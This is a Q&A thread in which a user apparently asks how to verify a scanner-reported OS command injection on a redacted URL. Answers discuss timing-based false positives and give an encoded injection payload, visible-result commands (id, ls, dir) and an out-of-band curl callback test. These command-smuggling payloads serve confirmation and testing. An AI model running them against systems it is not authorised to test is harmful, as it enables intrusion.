4

ZAP scanner found Remote OS command injection.

Is there any foolproof way to check if this works and is not a false positive?

I have tried to make it sleep 50 seconds but it's not something I can visually see, also the page does not seem to take longer to load.

This is the URL the scanner found vulnerable:

http://*SECRET*/*SECRET*?from&to

This is the exploit:

Attack: ACG"&sleep 5s&"

So I assume I should write the URL like this to exploit it:

http://*SECRET*/*SECRET*?from=ACG&sleep 5s&to=AMR

The above does not appear to make page take longer to load. Either I made a typo, or perhaps it is not vulnerable as the URL gets sanitized to: 

ACG&sleep%205s&to=AMR
techraf
  • 9,141
  • 11
  • 44
  • 62
k1308517
  • 1,272
  • 14
  • 27

2 Answers2

6

Automatic vulnerability scanners often produce false positives with timing based payloads.

This is because the scanner only checks if the request takes longer than the injected pause. If there is high network traffic - possibly because your scanner produces a lot of requests - this may happen even though the payload was not executed.

This means that you should always manually confirm timing based payloads (as you should confirm any other findings).

It's not quite clear to me what the actual payload is here. There are really two possibilities:

  • & is meant to be encoded, so the query string would be: ?from=ACG%22%26sleep%205s%26%22&to=AMR. This is the likely case. The vulnerable parameter would be from, and the payload would be ACG%22%26sleep%205s%26%22. It would exit the current string context via ", then add an additional command via & (which can be used to add additional commands in windows and linux), and finally get rid of the trailing " by adding another command via &.
  • & is not meant to be encoded, so you would add an additional parameter named sleep%005s with no value (less likely, but still possible).

You should try out both variants, first with a command that produces a visible result - such as id, ls, dir, etc - and then with a timing command such as sleep.

tim
  • 29,018
  • 7
  • 95
  • 119
  • http://*SECRET*/*SECRET*?from=ACG%22%26dir%26%22&to=AMR I tried this, as well as sleep but nothing seems to happen or get displayed. Have I made a mistake? – k1308517 Mar 30 '16 at 12:39
  • 2
    @k1308517 no, looks good. Like I said, it's probably a false positive anyways. If you want to make sure, I would take a look at the source code (if you have it). – tim Mar 30 '16 at 12:45
  • You posted two examples, I didn't really get the other one. Mind posting a example using my *SECRET* URL above? – k1308517 Mar 30 '16 at 15:16
  • 1
    @k1308517 the second point is the example you use in your question: `http://*SECRET*/*SECRET*?from=ACG&sleep 5s&to=AMR `. – tim Mar 30 '16 at 15:27
1

sleep does only put the thread asleep, if at all. Try something like

curl your.server.tld/whatever

and see if the request comes through in your server logs.

This might not be conclusive if the request does not come through, though.

External traffic could be blocked or curl not installed or anything else could go wrong.

Tobi Nary
  • 14,302
  • 8
  • 43
  • 58